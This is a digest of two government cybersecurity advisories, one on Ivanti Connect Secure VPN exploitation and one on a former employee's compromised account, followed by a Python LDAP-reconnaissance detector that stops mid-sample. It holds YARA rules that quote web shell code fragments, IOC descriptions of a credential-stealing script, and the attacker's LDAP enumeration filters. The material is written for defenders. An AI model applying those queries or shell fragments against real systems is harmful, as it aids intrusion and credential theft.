      • Mandiant: Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts

    Memory and disk forensics were used during forensic analysis, combined with the Integrity Checker Tool, to identify malicious files on the compromised Ivanti Connect Secure VPN appliance. This advisory provides a list of combined authoring organization IOCs and open source files identified by Volexity via network analysis.

    Disclaimer: Some IP addresses in this advisory may be associated with legitimate activity.
    Organizations are encouraged to investigate the activity around these IP addresses prior to taking action such as blocking. Activity should not be attributed as malicious without analytical evidence to support that it is used at the direction of, or controlled by, threat actors.

    DETECTION METHODS

    YARA Rules

    See Appendix D for additional open source YARA rules, provided by Volexity, that may aid network defenders in detecting malicious activity within Ivanti Connect Secure VPN appliances. For more information on detection methods, visit Mandiant’s blog post Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation or the Volexity GitHub page.

    INCIDENT RESPONSE

    The authoring organizations encourage you to assess your organization’s user interface (UI) software and systems for evidence of compromise and to hunt for malicious activity using signatures outlined within this advisory. If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the Ivanti Connect Secure VPN appliance, as well as execute arbitrary code and install malicious payloads.

    Note: These are vendor-managed appliances, and systems may be encrypted with limited access. Thus, collecting artifacts may be limited on some versions of appliances. The authoring organizations recommend investigating associated devices on the network to identify lateral movement in the absence of access to the Connect Secure appliance.

    If a potential compromise is detected, organizations should:

      • Quarantine or take offline potentially affected hosts.
      • Reimage compromised hosts.
      • Reset all credentials that may have been exposed during the compromise, including user and service accounts.
      • Identify Ivanti hosts with Active Directory (AD) access; threat actors can trivially export active domain administrator credentials during initial compromise. Until there is evidence to the contrary, it is assumed that AD access on compromised systems is connected to external authentication systems such as Lightweight Directory Access Protocol (LDAP) and AD.
      • Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
        Note: Removing malicious administrator accounts may not fully mitigate risk, considering threat actors may have established additional persistence mechanisms.
      • Report the compromise to the FBI Internet Crime Complaint Center (IC3) at IC3.gov, a local FBI field office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government entities can also report to MS-ISAC (SOC@cisecurity.org or 866-787-4722). Organizations outside of the United States should contact their national cyber center. (See the Reporting section.)

    MITIGATIONS

    These mitigations apply to all critical infrastructure organizations and network defenders using Ivanti Connect Secure VPN and Ivanti Policy Secure. The authoring organizations recommend that software manufacturers incorporate Secure by Design principles and tactics into their software development practices. These principles and tactics can limit the impact of exploitation—such as threat actors leveraging newly discovered, unpatched vulnerabilities within Ivanti appliances—thus strengthening the security posture for their customers. For more information on Secure by Design, see CISA’s Secure by Design webpage and joint guide.

    The authoring organizations recommend that organizations implement the mitigations below to improve their cybersecurity posture based on threat actor activity and to reduce the risk of compromise associated with Ivanti vulnerabilities. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST).
    The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

      • As organizations make risk decisions in choosing a VPN, including decisions regarding continued operation of Ivanti Connect Secure and Policy Secure gateways, avoid VPN solutions that use proprietary protocols or non-standard features. VPNs as a class of devices carry some specific risks that a non-expert implementer may trigger (e.g., authentication integration and patching). When choosing a VPN, organizations should consider vendors who:
          - Provide a Software Bill of Materials (SBOM) to proactively identify, and enable remediation of, embedded software vulnerabilities, such as deprecated operating systems.
          - Allow a restore from trusted media to establish a root of trust. If the software validation tooling can be modified by the software itself, there is no way to establish a root of trust other than returning the device to the manufacturer (return material authorization [RMA]).
          - Are a CVE Numbering Authority (CNA) so that CVEs are assigned to emerging vulnerabilities in a timely manner.
          - Have a public Vulnerability Disclosure Policy (VDP) to enable security researchers to proactively share and disclose vulnerabilities through coordinated vulnerability disclosure (CVD).
          - Have in place a clear end-of-life (EoL) policy to prepare customers for updating to supported product versions.
      • Limit outbound internet connections from SSL VPN appliances to restrict access to required services. This will limit the ability of an actor to download tools or malware onto the device or establish outbound connections to command and control (C2) servers.
      • Ensure SSL VPN appliances configured with Active Directory or LDAP authentication use low-privilege accounts for the LDAP bind.
      • Limit SSL VPN connections to unprivileged accounts only to help limit the exposure of privileged account credentials.
      • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
      • Secure remote access tools:
          - Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
      • Strictly limit the use of Remote Desktop Protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
          - Audit the network for systems using RDP.
          - Close unused RDP ports.
          - Enforce account lockouts after a specified number of attempts.
          - Apply phishing-resistant multifactor authentication (MFA).
          - Log RDP login attempts.
      • Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
      • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).
      • Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies:
          - Use longer passwords consisting of at least 15 characters [CPG 2.B].
          - Store passwords in hashed format using industry-recognized password managers.
          - Add password user “salts” to shared login credentials.
          - Avoid reusing passwords [CPG 2.C].
          - Implement multiple failed login attempt account lockouts [CPG 2.G].
          - Disable password “hints.”
          - Require administrator credentials to install software.
      • Review the CISA and NSA joint guidance for Selecting and Hardening Remote Access VPN Solutions.

    VALIDATE SECURITY CONTROLS

    In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how the controls perform against the ATT&CK techniques described in this advisory.

    To get started:

      1. Select an ATT&CK technique described in this advisory (Appendix C).
      2. Align your security technologies against the technique.
      3. Test your technologies against the technique.
      4. Analyze your detection and prevention technologies’ performance.
      5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
      6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.
    The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

    REPORTING

    U.S. organizations should report every potential cyber incident to the U.S. government. When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Reports can be submitted to the FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or by calling 1-844-Say-CISA (1-844-729-2472). The FBI encourages organizations to report information concerning suspicious or criminal activity to their local FBI Field Office.

    Australian organizations that have been impacted or require assistance regarding Ivanti compromise should contact ASD’s ACSC via 1300 CYBER1 (1300 292 371) or by submitting a report to cyber.gov.au. UK organizations that have been impacted by Ivanti compromise should report the incident to the National Cyber Security Centre. Organizations outside of the United States or Australia should contact their national cyber center.

    REFERENCES

      [1] Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN | Volexity
      [2] Ivanti Connect Secure VPN Exploitation Goes Global | Volexity
      [3] KB CVE-2023-46805 (Authentication Bypass) & CVE-2024-21887 (Command Injection) for Ivanti Connect Secure and Ivanti Policy Secure Gateways
      [4] Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation | Mandiant

    DISCLAIMER

    The information in this report is being provided “as is” for informational purposes only.
    CISA and the authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring organizations.

    ACKNOWLEDGEMENTS

    Volexity, Mandiant, and Ivanti contributed to this advisory.

    VERSION HISTORY

    February 29, 2024: Initial version.

    APPENDIX A: CISA’S PRODUCT EVALUATION FINDINGS

    Research Approach

    As part of ongoing efforts to effectively serve the cybersecurity community with actionable insights and guidance, CISA conducted research by using a free and downloadable version of the Ivanti Connect Secure virtual appliance to assess potential attack paths and adversary persistence mechanisms. The virtual appliances were not connected to the internet and were deployed in a closed virtualized network with a non-internet-connected Active Directory. This research included a variety of tests on version 22.3R1 Build 1647, connected to Active Directory credentials, to leverage the access obtained through CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893. Put simply, CISA’s research team wanted to answer the question: “How far could an attacker go if they were to exploit these CVEs remotely?”

    Persistent Post-Reset and -Upgrade Access

    Leveraging these vulnerabilities, CISA researchers were able to exfiltrate domain administrator cleartext credentials [TA0006], gain root-level persistence [TA0003], and bypass integrity checks used by the Integrity Checker application. CISA’s Incident Response team observed these specific techniques leveraged during the agency’s incident response engagements, along with the native tools and libraries used to conduct internal reconnaissance and compromise domains behind the Ivanti appliances.
    CISA researchers assess that threat actors are able to use the credentials to move deeper into the environment. The ability to exfiltrate domain administrator cleartext credentials, if saved when adding an “Active Directory Authentication server” during setup, was accomplished by using the root-level access obtained from the vulnerabilities to interface directly with the internal server and retrieve the cached credentials, as shown in Figure 4, Appendix A. Users who currently have active sessions to the appliance could have their base64-encoded Active Directory cleartext passwords, in addition to their New Technology LAN Manager (NTLM) password hashes, retrieved with the same access, as shown in Figure 10, Appendix A. In addition to users with active sessions, users previously authenticated can have base64-encoded Active Directory plaintext passwords and NTLM hashes harvested from the backups of the data.mdb database files stored on the appliance, as shown in Figures 15 and 16, Appendix A.

    The root-level access allows adversaries to maintain persistence despite issuing factory resets and appliance upgrades while deceiving the provided integrity checkers, creating the illusion of a clean installation. Because the persistence mechanism is stored on the encrypted partition of the drive and the integrity check results are inaccurate, it is untenable for network administrators to validate that their appliance has not been compromised without also decrypting the partition and validating it against a clean installation of the appliance, which are actions not easily accomplished at present. Without major alterations of the integrity checking process, it is conceivable that new vulnerabilities that afford root-level access to the appliance could also result in rootkit-level persistence on the appliance.
    Below is a proof of concept being released by CISA, which demonstrates the capacity of and opportunity for a threat actor to exfiltrate Domain Administrator credentials that were used during appliance configuration:

      • Figure 1: Ivanti Domain Join Configuration with “Save Credentials”
      • Figure 2: CVE-2023-46805 Exploitation for Reverse Netcat Connection
      • Figure 3: Upgrade Netcat Connection to Sliver Implant
      • Figure 4: Leverage Sliver Implant to Run Perl Script for Retrieval of Cached Domain Administrator Credentials

    Below is a demonstration of the capacity for post-exploitation exfiltration of base64-encoded cleartext credentials for Active Directory users and their associated NTLM password hashes:

      • Figure 5: Configuration of User Realm
      • Figure 6: User Realm Configuration to Domain
      • Figure 7: Configuration of User Realm Mapping
      • Figure 8: Login as “vpnuser1” to Establish an Active Session
      • Figure 9: Using Sliver Implant as Shown in Figure 3, Execute Perl Script to Retrieve base64 Encoded Cleartext Password and NTLM Password Hash for Authenticated User
      • Figure 10: Decode base64 Encoded Blob to Display User’s Plaintext Credentials
      • Figure 11: Using Mimikatz, Validate NTLM Password Hash Obtained in Figure 10 Matches Active Directory User Credential Hash
      • Figure 12: Inactive Sessions for “vpnuser2” and “vpnuser3” Appear in Server Logs
      • Figure 13: Exfiltrate “lmdb/data” and “lmdb-backup/data” data.mdb Database Files Containing Credentials for Active and Inactive Sessions
      • Figure 14: Parse Database Files to Disclose base64 Encoded Plaintext Credentials from LMDB Database Files
      • Figure 15: Parse Database Files to Disclose NTLM Hashes from LMDB Database Files
      • Figure 16: Parse Backup Database Files to Disclose Additional base64 Encoded Plaintext Credentials from LMDB-Backup Database Files
      • Figure 17: Decode Credentials from LMDB-Backup Database Files
      • Figure 18: Parse Database Files to Disclose NTLM Hashes for Additional Users from LMDB-Backup Database Files

    APPENDIX B: INDICATORS OF COMPROMISE

    Table 1: Ivanti Connect Secure VPN Indicators of Compromise (Filename; Description; Purpose)

      • /home/perl/DSLogConfig.pm: Modified Perl module. Designed to execute sessionserver.pl.
      • /usr/bin/a.sh: gcore.in core dump script.
      • /bin/netmon: Sliver binary.
      • /home/venv3/lib/python3.6/site-packages/*.egg: Python package containing WIREFIRE among other files.
      • /home/etc/sql/dsserver/sessionserver.pl: Perl script to remount the filesystem with read/write access. Makes sessionserver.sh executable, executes it, then restores the original mount settings.
      • /home/etc/sql/dsserver/sessionserver.sh: Script executed by sessionserver.pl. Uses regular expressions to modify compcheckresult.cgi to insert a web shell into it; also creates a series of entries in files associated with the in-built Integrity Checker Tool to evade detection when periodic scans are run.
      • /home/webserver/htdocs/dana-na/auth/compcheckresult.cgi: Modified legitimate component of the ICS VPN appliance, with new Perl module imports added and a one-liner to execute commands based on request parameters. Allows remote code execution over the Internet if the attacker can craft a request with the correct parameters.
      • /home/webserver/htdocs/dana-na/auth/lastauthserverused.js: Modified legitimate JavaScript component loaded by the user login page of the Web SSL VPN component of Ivanti Connect Secure. Modified to harvest entered credentials and send them to a remote URL on an attacker-controlled domain.

    Table 2: Ivanti Connect Secure VPN Indicators of Compromise (Value; Type; Description)
    Table 3: Host-Based Indicators (HBIs) Indicators of Compromise (Filename; Hash Value; Description)

    Table 4: Host-Based Indicators (HBIs) Indicators of Compromise (Network Indicator; Type; Description)

    APPENDIX C: MITRE ATT&CK TACTICS AND TECHNIQUES

    Initial Access (Technique Title; ID; Use)
      • Exploit Public-Facing Applications; T1190; Cyber actors will use custom web shells planted on public-facing applications, which allow persistence in victims’ environments.

    Persistence (Technique Title; ID; Use)
      • Valid Accounts; T1078; Cyber actors leverage compromised accounts to laterally move within internal systems via RDP, SMB, and SSH.
      • Server Software Component: Web Shell; T1505.003; Cyber actors may use web shells on internal- and external-facing web servers to establish persistent access to systems.

    Execution (Technique Title; ID; Use)
      • Command and Scripting Interpreter: PowerShell; T1059.001; Cyber actors leverage code execution from request parameters that are decoded from hex, then base64-decoded, then passed to Assembly.Load(), which is used to execute arbitrary PowerShell commands.
      • Exploitation for Client Execution; T1203; Cyber actors will exploit software vulnerabilities such as command injection and achieve unauthenticated remote code execution (RCE).
    APPENDIX D: DETECTION METHODS

    rule apt_webshell_pl_complyshell: UTA0178
    {
        meta:
            author = "threatintel@volexity.com"
            date = "2023-12-13"
            description = "Detection for the COMPLYSHELL webshell."
            hash1 = "8bc8f4da98ee05c9d403d2cb76097818de0b524d90bea8ed846615e42cb031d2"
            os = "linux"
            os_arch = "all"
            report = "TIB-20231215"
            scan_context = "file,memory"
            last_modified = "2024-01-09T10:05Z"
            license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
            rule_id = 9995
            version = 4
        strings:
            $s = "eval{my $c=Crypt::RC4->new("
        condition:
            $s
    }

    rule apt_webshell_aspx_glasstoken: UTA0178
    {
        meta:
            author = "threatintel@volexity.com"
            date = "2023-12-12"
            description = "Detection for a custom webshell seen on external facing server. The webshell contains two functions, the first is to act as a Tunnel, using code borrowed from reGeorg, the second is custom code to execute arbitrary .NET code."
            hash1 = "26cbb54b1feb75fe008e36285334d747428f80aacdb57badf294e597f3e9430d"
            os = "win"
            os_arch = "all"
            report = "TIB-20231215"
            scan_context = "file,memory"
            last_modified = "2024-01-09T10:08Z"
            license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
            rule_id = 9994
            version = 5
        strings:
            $s1 = "=Convert.FromBase64String(System.Text.Encoding.Default.GetString(" ascii
            $re = /Assembly\.Load\(errors\)\.CreateInstance\("[a-z0-9A-Z]{4,12}"\).GetHashCode\(\);/
        condition:
            for any i in (0..#s1):
                (
                    $re in (@s1[i]..@s1[i]+512)
                )
    }

    rule webshell_aspx_regeorg
    {
        meta:
            author = "threatintel@volexity.com"
            date = "2018-08-29"
            description = "Detects the reGeorg webshell based on common strings in the webshell. May also detect other webshells which borrow code from ReGeorg."
            hash = "9d901f1a494ffa98d967ee6ee30a46402c12a807ce425d5f51252eb69941d988"
            os = "win"
            os_arch = "all"
            reference = "https://github.com/L-codes/Neo-reGeorg/blob/master/templates/tunnel.aspx"
            report = "TIB-20231215"
            scan_context = "file,memory"
            last_modified = "2024-01-09T10:04Z"
            license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
            rule_id = 410
            version = 7
        strings:
            $a1 = "every office needs a tool like Georg" ascii
            $a2 = "cmd = Request.QueryString.Get(\"cmd\")" ascii
            $a3 = "exKak.Message" ascii
            $proxy1 = "if (rkey != \"Content-Length\" && rkey != \"Transfer-Encoding\")"
            $proxy_b1 = "StreamReader repBody = new StreamReader(response.GetResponseStream(), Encoding.GetEncoding(\"UTF-8\"));" ascii
            $proxy_b2 = "string rbody = repBody.ReadToEnd();" ascii
            $proxy_b3 = "Response.AddHeader(\"Content-Length\", rbody.Length.ToString());" ascii
        condition:
            any of ($a*) or
            $proxy1 or
            all of ($proxy_b*)
    }

    rule hacktool_py_pysoxy
    {
        meta:
            author = "threatintel@volexity.com"
            date = "2024-01-09"
            description = "SOCKS5 proxy tool used to relay connections."
            hash1 = "e192932d834292478c9b1032543c53edfc2b252fdf7e27e4c438f4b249544eeb"
            os = "all"
            os_arch = "all"
            reference = "https://github.com/MisterDaneel/pysoxy/blob/master/pysoxy.py"
            report = "TIB-20240109"
            scan_context = "file,memory"
            last_modified = "2024-01-09T13:45Z"
            license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
            rule_id = 10065
            version = 3
        strings:
            $s1 = "proxy_loop" ascii
            $s2 = "connect_to_dst" ascii
            $s3 = "request_client" ascii
            $s4 = "subnegotiation_client" ascii
            $s5 = "bind_port" ascii
        condition:
            all of them
    }

    rule apt_webshell_py_categorical: UTA0178
    {
        meta:
            author = "threatintel@volexity.com"
            date = "2024-01-18"
            description = "Detection for the CATEGORICAL webshell."
            os = "linux"
            os_arch = "all"
            scan_context = "file,memory"
            severity = "critical"
        strings:
            $s1 = "exec(zlib.decompress(aes.decrypt(base64.b64decode" ascii
            $s2 = "globals()[dskey].pop('result',None)" ascii
            $s3 = "dsid=request.cookies.get('DSID'" ascii
        condition:
            any of ($s*)
    }

  • Threat Actor Leverages Compromised Account of Former Employee to Access State Government Organization
    by CISA (CISA Cybersecurity Advisories) on 14 February 2024 at 8:19 pm

    SUMMARY The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) conducted an incident response assessment of a state government organization’s network environment after documents containing host and user information, including metadata, were posted on a dark web brokerage site. Analysis confirmed that an unidentified threat actor compromised network administrator credentials through the account of a former employee—a technique commonly leveraged by threat actors—to successfully authenticate to an internal virtual private network (VPN) access point, further navigate the victim’s on-premises environment, and execute various lightweight directory access protocol (LDAP) queries against a domain controller.[1] Analysis also focused on the victim’s Azure environment, which hosts sensitive systems and data, as well as the compromised on-premises environment. Analysis determined there were no indications the threat actor further compromised the organization by moving laterally from the on-premises environment to the Azure environment. CISA and MS-ISAC are releasing this Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) used by the threat actor and methods to protect against similar exploitation of both unnecessary and privileged accounts. Download the PDF version of this report: AA24-046A Threat Actor Leverages Compromised Account of Former Employee to Access State Government Organization (PDF, 499.99 KB ) TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actor’s activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. 
Overview A state government organization was notified that documents containing host and user information, including metadata, were posted on a dark web brokerage site. After further investigation, the victim organization determined that the documents were accessed via the compromised account of a former employee. Threat actors commonly leverage valid accounts, including accounts of former employees that have not been properly removed from the Active Directory (AD), to gain access to organizations.[1] CISA and MS-ISAC assessed that an unidentified threat actor likely accessed documents containing host and user information to post on the dark web for profit after gaining access through the account of a former employee. The scope of this investigation included the victim organization’s on-premises environment, as well as their Azure environment, which hosts sensitive systems and data. Analysis determined the threat actor did not move laterally from the compromised on-premises network to the Azure environment and did not compromise sensitive systems. Untitled Goose Tool Incident responders collected Azure and Microsoft Defender for Endpoint (MDE) logs using CISA’s Untitled Goose Tool—a free tool to help network defenders detect potentially malicious activity in Microsoft Azure, Azure Active Directory (AAD), and Microsoft 365 (M365) environments. CISA developed the Untitled Goose Tool to export and review AAD sign-in and audit logs, M365 unified audit logs (UAL), Azure activity logs, and MDE data. By exporting cloud artifacts, Untitled Goose Tool supports incident response teams with environments that do not ingest logs into a security information and event management (SIEM) tool. Threat Actor Activity The logs revealed the threat actor first connected from an unknown virtual machine (VM) to the victim’s on-premises environment via internet protocol (IP) addresses within their internal VPN range. 
CISA and MS-ISAC assessed that the threat actor connected to the VM through the victim’s VPN [T1133] with the intent to blend in with legitimate traffic to evade detection. Initial Access: Compromised Domain Accounts USER1: The threat actor gained initial access through the compromised account of a former employee with administrative privileges (USER1) [T1078.002] to conduct reconnaissance and discovery activities. The victim organization confirmed that this account was not disabled immediately following the employee’s departure. The threat actor likely obtained the USER1 account credentials in a separate data breach due to the credentials appearing in publicly available channels containing leaked account information [T1589.001]. USER1 had access to two virtualized servers including SharePoint and the workstation of the former employee. The workstation was virtualized from a physical workstation using the Veeam Physical to Virtual (P2V) function within the backup software. USER2: The threat actor likely obtained the USER2 account credentials from the virtualized SharePoint server managed by USER1 [T1213.002]. The victim confirmed that the administrator credentials for USER2 were stored locally on this server [T1552.001]. Through connection from the VM, the threat actor authenticated to multiple services [T1021] via the USER1 account, as well as from an additional compromised global domain administrator account (USER2) [T1078.002]. The threat actor’s use of the USER2 account was impactful due to the access it granted to both the on-premises AD and Azure AD [T1021.007], thus enabling administrative privileges [T1078.004]. Following notification of the dark web posting, the victim organization immediately disabled the USER1 account and took the two virtualized servers associated with the former employee offline. The victim also changed the password for the USER2 account and removed administrator privileges. 
Neither of the administrative accounts had multifactor authentication (MFA) enabled.

LDAP Queries

Through connection from the VM, the threat actor conducted LDAP queries of the AD, likely using the open source tool AdFind.exe, based on the format of the output. CISA and MS-ISAC assess the threat actor executed the LDAP queries [T1087.002] to collect user, host [T1018], and trust relationship information [T1482]. It is also believed the LDAP queries generated the text files the threat actor posted for sale on the dark web brokerage site: ad_users.txt, ad_computers.txt, and trustdmp.txt. Table 1 lists all queries that were conducted between 08:39:43 and 08:40:56 Coordinated Universal Time (UTC).

Table 1: LDAP Queries Conducted by the Threat Actor

Query: LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Person,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local)
Description: Collects names and metadata of users in the domain.

Query: LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Computer,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local)
Description: Collects names and metadata of hosts in the domain.

Query: LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Trusted-Domain,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local)
Description: Collects trust information in the domain.

Query: LDAP Search Scope: WholeSubtree, Base Object: DC=[REDACTED],DC=local, Search Filter: (&(&(sAMAccountType=805306368)(servicePrincipalName=*)(!(sAMAccountName=krbtgt))(!(userAccountControl&2)))(adminCount=1))
Description: Collects Domain Administrators and Service Principals in the domain (enabled user accounts that carry a servicePrincipalName and adminCount=1, excluding krbtgt).

Service Authentication

Through the VM connection, the threat actor was observed authenticating to various services on the victim organization's network from the USER1 and USER2 administrative accounts.
In all instances, the threat actor authenticated to the Common Internet File System (CIFS) service on various endpoints [T1078.002],[T1021.002], a protocol used for providing shared access to files and printers between machines on the network. This was likely used for file, folder, and directory discovery [T1083], and is assessed to have been executed in an automated manner. USER1 authenticated to four services, presumably for the purpose of network and service discovery [T1046]. USER2 authenticated to twelve services. Note: This account had administrative privileges to both the on-premises network and Azure tenant.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 2-9 for all referenced threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK's Best Practices for MITRE ATT&CK Mapping and CISA's Decider Tool.

Table 2: Reconnaissance
• Gather Victim Identity Information: Credentials (T1589.001): The actor likely gathered USER1 account credentials in a data breach where account information appeared in publicly available channels.

Table 3: Initial Access
• Valid Accounts: Domain Accounts (T1078.002): The actor gained initial access through the compromised account of a former employee with administrative privileges (USER1). The employee's account was not immediately disabled after their departure.

Table 4: Persistence
• External Remote Services (T1133): The actor connected a VM via the victim's VPN to blend in with legitimate traffic to evade detection.

Table 5: Privilege Escalation
• Valid Accounts: Domain Accounts (T1078.002): The actor authenticated to multiple services from a compromised Global Domain Administrator account (USER2). The actor also authenticated to CIFS on various endpoints.
• Valid Accounts: Cloud Accounts (T1078.004): The actor used a compromised account (USER2) which was synced to both the on-premises AD and Azure AD, thus enabling administrative privileges to both the on-premises network and Azure tenant.

Table 6: Credential Access
• Unsecured Credentials: Credentials in Files (T1552.001): The actor likely obtained USER2 account credentials from the virtualized SharePoint server where they were locally stored.

Table 7: Discovery
• Account Discovery: Domain Account (T1087.002): Through the VM connection, the actor executed LDAP queries of the AD.
• Remote System Discovery (T1018): Through the VM connection, the actor executed LDAP queries to collect user and host information.
• Domain Trust Discovery (T1482): Through the VM connection, the actor executed LDAP queries to collect trust relationship information.
• File and Directory Discovery (T1083): The actor authenticated to CIFS on various endpoints, likely for the purpose of file, folder, and directory discovery.
• Network Service Discovery (T1046): The actor used the compromised USER1 account to authenticate to four services, presumably for the purpose of network and service discovery.

Table 8: Lateral Movement
• Remote Services (T1021): The actor connected from an unknown VM and authenticated to multiple services via the USER1 account.
• Remote Services: Cloud Services (T1021.007): The actor used the USER2 account, which granted access to the Azure AD as well as the on-premises AD.
• Remote Services: SMB/Windows Admin Shares (T1021.002): The actor used compromised accounts to interact with a remote network share using Server Message Block.

Table 9: Collection
• Data from Information Repositories: SharePoint (T1213.002): The actor likely obtained the USER2 account credentials from the virtualized SharePoint server managed by USER1.
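As an added example that is not part of the advisory: a small detector that recognises the Table 1 filters in LDAP search logs and raises an alert when one client issues several distinct reconnaissance query types inside a short window, the way the burst above did between 08:39:43 and 08:40:56. The log line layout, the category names and the sample log are constructed for this example; real DC-side LDAP auditing or a network sensor will need its own LINE_RE, the detection logic stays the same.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Recon filter fingerprints drawn from Table 1. The category names are this
# example's own; the regexes accept both the objectCategory=CN=...,CN=Schema
# form AdFind emits and the short objectCategory=person form.
RECON_PATTERNS = {
    "user_enum": re.compile(r"objectCategory=(CN=)?Person\b", re.I),
    "host_enum": re.compile(r"objectCategory=(CN=)?Computer\b", re.I),
    "trust_enum": re.compile(r"objectCategory=(CN=)?Trusted-?Domain\b", re.I),
    "spn_enum": re.compile(r"servicePrincipalName=\*", re.I),
    "admin_enum": re.compile(r"adminCount=1\b", re.I),
}

# Constructed log format (assumption): one LDAP search per line. Windows
# LDAP query logging uses a different layout; adapt this regex, not the logic.
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+client=(?P<client>\S+)\s+base=(?P<base>\S+)\s+"
    r"scope=(?P<scope>\S+)\s+filter=(?P<filter>.+)$"
)


def classify(ldap_filter: str) -> set:
    """Return the recon categories an LDAP filter string matches."""
    return {name for name, rx in RECON_PATTERNS.items() if rx.search(ldap_filter)}


def parse(lines):
    """Yield (timestamp, client, categories) for each parsable log line."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m["client"], classify(m["filter"])


def detect_bursts(lines, window_seconds=120, min_categories=3):
    """Alert when one client issues >= min_categories distinct recon query
    types inside a sliding window. Table 1's four queries spanned 73 s."""
    by_client = defaultdict(list)
    for ts, client, cats in parse(lines):
        if cats:
            by_client[client].append((ts, cats))
    window = timedelta(seconds=window_seconds)
    alerts = []
    for client, events in by_client.items():
        events.sort(key=lambda e: e[0])
        for i, (start, _) in enumerate(events):
            seen = set()
            for ts, cats in events[i:]:
                if ts - start > window:
                    break
                seen |= cats
            if len(seen) >= min_categories:
                alerts.append({"client": client, "start": start,
                               "categories": sorted(seen)})
                break  # one alert per client is enough for triage
    return alerts


# Constructed sample log: the Table 1 burst from one client, plus two
# ordinary-looking lookups from other clients that must not alert.
SAMPLE_LOG = """\
2024-01-10T08:39:43Z client=10.8.0.23 base=DC=corp,DC=local scope=WholeSubtree filter=(objectCategory=CN=Person,CN=Schema,CN=Configuration,DC=corp,DC=local)
2024-01-10T08:39:58Z client=10.8.0.23 base=DC=corp,DC=local scope=WholeSubtree filter=(objectCategory=CN=Computer,CN=Schema,CN=Configuration,DC=corp,DC=local)
2024-01-10T08:40:12Z client=10.8.0.50 base=DC=corp,DC=local scope=WholeSubtree filter=(&(objectClass=user)(sAMAccountName=jdoe))
2024-01-10T08:40:31Z client=10.8.0.23 base=DC=corp,DC=local scope=WholeSubtree filter=(objectCategory=CN=Trusted-Domain,CN=Schema,CN=Configuration,DC=corp,DC=local)
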